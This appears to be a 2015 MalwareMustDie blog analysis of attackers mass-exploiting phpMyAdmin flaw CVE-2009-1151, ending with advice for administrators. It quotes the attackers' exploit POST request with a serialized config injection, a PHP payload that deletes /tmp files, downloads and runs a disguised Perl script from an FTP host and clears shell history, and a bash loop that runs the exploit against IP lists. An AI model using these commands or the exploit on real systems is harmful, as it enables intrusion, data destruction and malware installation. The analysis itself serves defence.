phpMyAdmin PMA vuln CVE-2009-1151
How CVE-2009-1151 is used in the wild

Today we (MalwareMustDie) found this thread of automated exploiting phpMyAdmin instances which are vulnerable to CVE-2009-1151. In short: this uses a false escaped vari able which can be used to run code which is then included in config.inc.php, see this interesting blog post for additional information.

We found a pack of files that the morons used. They use a PHP script to run it in console and exploit remote systems, there a POST request is beeing used with a fake user agent and the exploit code:

    send_data('POST',$pma_setup_url,'action=lay_navigation&eoltype=unix&token='.$token.'&configuration='.urlencode('a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($ftp_code).':"'.$ftp_code.'";}}'),$pma_setup_url,$cookie_array,'Opera');

$ftp_code is: 'ftp://andre:[email protected]/fafico.ico';, where fafico.ico contains that:

    <? system("cd /tmp;rm -rf *;wget ftp://sysbackup1:[email protected]/c.pdf;perl c.pdf;curl -O
    ftp://sysbackup1:[email protected]/c.pdf;perl c.pdf;fetch
    ftp://sysbackup1:[email protected]/c.pdf;perl
    c.pdf;rm -rf c.pdf;history -c;");exit?>

This will download more malware and beeing executed, tried to camouflage as a PDF in a very stupid way. The FTP account work anymore, so I could not gain an example. The whole files are styled CTRL+C CTRL+V. The morons where even to stupid to run the files in a proper way or edit them in a proper way, there are dozens of tiny .sh scripts which just run the PHP exploit script, for example:

    #!/bin/bash
    #php exploitx.php -a $1

    for i in `cat v`
    do
    echo Il furam pe nenea de access $i
    #php exploitx.php -a $i
    command='php exploitx.php -a '$i'';
    # run $command in background, sleep for our timeout then kill the process if it is running
    echo $command
    $command &
    pid=$!
    echo "sleep 10; kill $pid" |
    wait $pid &> /dev/null
    if [ $? -eq 143 ]; then
    echo "Trecem la urmatorul 10 secs reached."
    echo
    fi

    done

Also we found there some lists of vulnerable phpMyAdmin installs. Why they are vulnerable at this time to this old CVE? Because admins are not upgrading their system. With the latest phpMyAdmin version this wont work anymore, so why not update? The IP lists contain thousand s of servers, they just scanned hole IP ranges. vuln.txt as example contains 306615 vulnerable phpMyAdmin installs! Well, many are not reachable but the problem keeps, many outdated phpMyAdmin installs are aviable.

Also they are downloading an ELF malware which is fairly old and known, but not by ClamAV as an example.

Also included are public PHP classes which are misused to run their evil crap, like for guessing the OS and getting details about it: OS_Guess.

Following is a list of the IP’s which host their bad scripts via FTP:

Here you can find some gathered information and additional information about this.

Inside is also the ELF zmeu, VT link. Hashes:

It’s a known vulnerability scanner for phpMyAdmin.

Interesting is also a string I found in the file rand, which is used to scan the IP ranges:

    # zmeu blackhat anti-sec

So we have a name?

Conclusion

Administrators, take care of your systems and to upgrade them in time. Outdated versions are always more risky to use than current ones. Please have that always in mind. And don’t use simple passwords, 123456 is no password, this are just digits! Also important: Change the default directory name of your phpMyAdmin install, this will prevent to be found by their automated scanners.

MalwareMustDie! Also mentioning our brilliant ELF team, great work, awesome interaction and sharp chop sticks! We add the spicy in your rice!

*****
Written by wirehack7 on 18 January 2015